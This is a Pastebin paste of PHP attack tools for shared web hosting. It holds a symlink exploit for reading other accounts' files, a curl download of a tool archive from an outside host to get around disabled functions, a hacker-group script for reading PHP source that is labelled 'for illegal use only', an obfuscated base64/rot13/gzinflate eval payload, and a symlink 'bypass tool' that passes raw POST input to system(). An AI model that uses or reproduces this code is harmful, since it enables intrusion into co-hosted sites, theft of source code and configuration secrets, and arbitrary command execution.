Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ======================Symlink (PHP) Exploit==================================
- $filepath='/home/xx/public_html/xx.xx';
- $sitepath='/home/xx/public_html/'; $writeblefilepath='myfile.txt';
- $flib=$sitepath.$wr iteblefilepath; @unlink($flib);
- symlink($filepath, $flib); echo readlink($flib) . "\n"; echo "<textarea cols=30 rows=10>".file_get_contents("http://" . $_SERVER['HTTP_HOST'] . "/" . $writeblefilepath)."</tex" . "tarea>";
- @unlink($flib);
- ====================Eval code disable function wget bypass=============================
- $curl = curl_init("http://www.dosyasitesi.com/safemodefuck.tar.gz");
- curl_setopt($curl, CURLOPT_HEADER, false);
- curl_setopt($curl, CURLOPT_VERBOSE, false);
- curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
- $output = curl_exec($curl);
- curl_close($curl);
- $dosya = fopen("safemodefuck.tar.gz", "a+");
- fwrite($dosya, $output);
- fclose($dosya);
- =============Reading PHP files source code Without Using Commands====================
- <?php
- /*------------------------------------------------------------------------------------------------------------*\
- # This Script for Reading PHP files source code Without Using Commands
- # Work on Execpt cPanel Servers
- # Created by ZombiE_KsA
- # sh0tz : spo0fer, x00mx00m, Cyber-Criminal, Agd_Scorp, Ab0_m0hamm3d, GNOM , The Moorish , By_Ogmass, Hebarieh
- # n00bz : sec-r1z.com, (r1z), Red-D3v1L and all script kiddies
- # Copyright 2001 - 2010 PAKbugs All Rights Reserved
- # Pakbugs.com
- \*--------------------------------------------------------------------------------- ---------------------------*/
- #FUCK THE C0DE!
- #?>
- <style type="text/css">
- <!--
- body,td,th {
- color: #093;
- }
- body {
- background-color: #000;
- }
- -->
- </style>
- <?
- $sub1 = "<PRE><P>This Script for Reading PHP files source code Without Using Commands <a href=\"http://pakbugs.com\">http://pakbugs.com</a> <p>Script for illegal use only.<p>Worked Except whm/cPanel servers<p>More: <a href=\"http://pakbugs.com\">http://pakbugs.com</a><p><form name=\"form\" action=\"http://".$_SERVER["HTTP_HOST"].htmlspecialchars($_SERVER["SCRIPT_NAME"])."\" method=\"post\"><input type=\"text\" name=\"file\" size=\"50\" value=\"\"><input type=\"submit\" name=\"studiaNAuwrCZYpwrTOmanipulacja\" value=\"Show\"> </form>\n";
- echo htmlspecialchars_decode($sub1, ENT_NOQUOTES);
- #
- #
- #
- if(!is_dir(dirname(__FILE__)."/http:")){ // can work without this requirement
- #
- if(!is_writable(dirname(__FILE__))) die("<b>I can't create http:directory</b>");
- #
- mkdir("http:");
- #
- }
- #
- #
- if(empty($file) and empty($_GET['file']) and empty($_POST['file']))
- #
- die("\n".$karatonik);#
- if(!empty($_GET['file'])) $file=$_GET['file'];
- #
- if(!empty($_POST['file'])) $file=$_POST['file'];
- #
- #
- #
- if((curl_exec(curl_init("file:http://../".htmlspecialchars_decode($file)))) and !empty($file)) die("<B><br>pakbugs.com str1k3</B><p>Sh0tz: spo0fer, x00mx00m, Cyber-Criminal, Agd_Scorp, Ab0_m0hamm3d, GNOM , The Moorish , By_Ogmass, Hebarieh <p>Script Kiddies/n00bz: sec-r1z.com, (r1z), Red-D3v1L, SAS-terr0rist <p></FONT>");
- #
- elseif(!emptY($file)) die("<FONT COLOR=\"RED\"><CENTER>Sorry... File<B>".htmlspecialchars($file)."</B> doesn't exists or you don't have permissions.</CENTER></FONT>");
- #
- ?>
- ===================priv8 symlink() 0day coded by NazZ================================
- <?php
- // Symlink ByPass Tool
- // NaZZ
- // Credits to IT-Sec
- eval(gzinflate(str_rot13(base64_decode('Dc7HzptXAEDhx8l/xcIU0xRygYGhGNMxchPRwaYNUH/6m7P/pEZhdvdGX+1DaOlF/qBy/juPC079cSkqmfvfoszHovz5JeWRiqAeCYLkXPSXPW/dH2iwmM6mePL9UdO3NU4CcU+lsUKBJ4vAMtQNooOc7XJmLmlcKrogVKyteYDcvG9PqDcRYptq8V0rcbk2tiAxxe5WLAcRcdkb/22Ys5/HLn5eRxnxQVVN4XhSg0nw1JbZCwW9DxtR/9irfx5sHfrkOXfcViagjvOuiafWfGczt8jEUwXsIqVD7mSOjD2HLSWvSPNSRp021PjR+RBo/GLQBS9HXGpOG91dP9Fhx4bPdMG+6K7bZUqIdGvcliPx/c4AtrjW9tYmvb4NueJ4JS692mVFoCkNGyVqLmYvkc/3RLoTjzGutP6jXN46GtyHas/AR70CMrZAO3IaLmTF52wI6vOTCMbKW2RlG+QBk58z2w20I+hp1AH7U64B+rbt4qDXDqC9GpkIC6MABsbMJq5HyqZFdj86lv0yJuWM3o+vXXQvePRM0UMPPsxmE+Pzgd6Nwjp7kjCCxwGTkR7wRMauXDnDaJNwFxLiXgQtQ+O5ATpyDoEl1l0yTDTemM6zPfNmcGmDAevAF6znx84Z3NzRo1Ui/0daTIsizSZqB9cvQQQsyffFbuZ2Bx9YX1GG/W/AAd/egfW1o0Er8Pw3PbGSk4xC8sqhSqvKREyEh9Ajv8+E7xRgVbW58y5UotFZzC3SstvE4fR5Dp9r3SVywM9kI942jZXFa+zbjWK8b1ZsnNK062babHk+n85LiUe7+djVcChMK76C78xQMuOacpL66tuAAVJf+CSUZoRohk3qjO2cpBuyViynY3PmYygPDUkrkrmBTCZAkHKbAR7R+7lIYsYMztlEyym3fIWtvsXxikeiRsHeGyV87CCdlhB+2uTQTaaX4E3QpgbHdTYMmnVzZJjNyPI81Ra4DUWZa7el7NFUO21Yg2n/KmFGInDmPErtt1ZjI2+5SBuF0eztJjh//vz671+//wc='))));
- ?>
- ----------------------------------------
- <?php
- if(strtolower(substr(PHP_OS, 0, 3)) == "win"){
- echo '<script>alert("This function does not work on Windows platforms.")</script>';exit;
- }else{
- $slash="/";
- $basep=str_replace("\\","/",$basep);
- }
- $s=$_SERVER['PHP_SELF'];
- echo '<style type="text/css">
- body {
- background-color:#000000; color:#ffffff; font-family: Agency FB; font-size: 20px; text-align:center;
- }
- p.head {
- font-family: Agency FB; font-size: 40px;
- }
- p.text {
- font-family: Agency FB; font-size: 15px;
- }
- </style>';
- echo '<p class="head"><big>Symlink Bypass Tool</big></p>';
- echo '<form method=post action="'.$s.'">
- <p align="center">
- SymLink With PHP<br><input name=ad1syp size=50> << >> <input value="'.getcwd().$slash."symlink.txt".'" name=ad2syp size=50><br><input type=submit value=Submit><p align="center"></form>
- <form method=post action="'.$s.'"><p align="center">
- SymLink With OS : <br><input name=ad1syc size=50> << >> <input value="'.getcwd().$slash."symlink.txt".'" name=ad2syc size=50><br><input type=submit value=Submit>
- </p></form><br><p class="text">© Coded By NaZZ</p>';
- if ($_POST['ad1syp'] && $_POST['ad2syp']){
- if (symlink($_POST['ad1syp'],$_POST['ad2syp'])){
- echo "<script>alert('Symlink Worked')</script>";
- }else{
- echo "<script>alert('Symlink Not Worked')</script>";
- }}
- if ($_POST['ad1syc'] && $_POST['ad2syc']){
- if (system('ls -s '.$_POST['ad1syc']." ".$_POST['ad2syc'])){
- echo "<script>alert('Symlink Worked')</script>";
- }else{echo "<script>alert('Symlink Not Worked')</script>";
- }}
- ?>
Add Comment
Please, Sign In to add comment